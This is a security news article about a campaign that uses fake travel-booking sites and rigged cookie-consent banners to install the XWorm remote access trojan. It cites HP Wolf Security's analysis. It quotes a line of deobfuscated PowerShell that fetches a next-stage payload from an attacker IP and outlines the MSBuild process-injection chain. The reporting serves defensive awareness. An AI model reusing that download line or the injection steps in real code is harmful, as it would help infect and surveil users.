Threat Actors Using Fake Travel Websites to Infect Users’ PCs with XWorm Malware

A sophisticated cybercrime campaign has emerged targeting holiday travelers through meticulously crafted fake travel booking websites designed to mimic legitimate platforms like Booking.com.

The operation, which gained significant momentum in the first quarter of 2025, represents an alarming evolution in social engineering tactics as cybercriminals exploit users’ habitual interactions with routine web elements to deliver malicious payloads.

The campaign’s primary weapon is XWorm, a potent remote access trojan (RAT) that grants attackers comprehensive control over infected systems while enabling extensive data theft capabilities.

What makes this particular campaign especially insidious is its exploitation of “click fatigue” – the common user behavior of quickly dismissing cookie consent banners without careful consideration.

By weaponizing these ubiquitous GDPR compliance elements, threat actors have transformed a routine browsing interaction into a malware distribution mechanism.

HP Wolf Security analysts identified this campaign early through analysis of domain registration patterns, noting that multiple malicious domains were registered simultaneously on February 23, 2025.

The researchers observed that this activity represents a significant departure from previous fake CAPTCHA-based campaigns, demonstrating the threat actors’ continuous innovation in social engineering methodologies to maximize infection rates.

The financial and operational impact of this campaign extends beyond individual victims, as XWorm’s capabilities include comprehensive system reconnaissance, credential harvesting, and persistent backdoor access.

Organizations face potential data breaches, intellectual property theft, and lateral movement within corporate networks when employees’ personal devices become compromised through these seemingly legitimate travel booking activities.

Infection Mechanism

The attack begins when potential victims navigate to fraudulent websites that closely replicate the appearance and functionality of legitimate travel booking platforms.

Upon accessing these sites, users encounter what appears to be a standard cookie consent banner, complete with familiar “Accept” and “Decline” options that have become second nature to most internet users.

When victims click the “Accept” button, the malicious banner initiates a JavaScript download while displaying a convincing loading animation.

The social engineering component becomes particularly effective at this stage, as the banner instructs users to click on the downloaded file to complete the cookie acceptance process – a request that appears reasonable given the context of GDPR compliance requirements.

The downloaded JavaScript file serves as the initial payload delivery mechanism, executing two PowerShell scripts in the background while masquerading as legitimate system processes.

These scripts cleverly employ the .mp4 file extension as a deception tactic, likely designed to evade detection by security analysts examining web proxy logs for suspicious PowerShell activity.

The PowerShell execution chain demonstrates sophisticated technical implementation, as shown in the deobfuscated code that downloads the next-stage payload: $CNfID4AHhe = "http://185.7.214.54/js.exe" followed by systematic .NET assembly loading and execution procedures.

The malware employs an intricate process injection technique, loading a .NET program that compiles another binary at runtime before injecting the final XWorm payload into a legitimate MSBuild.exe process.

This injection method represents a particularly advanced evasion technique, as the malware writes its components section by section into the target process memory space, effectively masking its presence within legitimate system processes.

The thread context manipulation and execution redirection ensure that XWorm operates seamlessly within the compromised environment while maintaining persistence through registry modifications and startup folder entries.

Here’s the convincing lure website interface above, while the figure below reveals the deobfuscated JavaScript code structure.

This initiates the malicious download sequence, demonstrating the campaign’s technical sophistication and social engineering effectiveness.

Automate threat response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs across all endpoints -> Request full access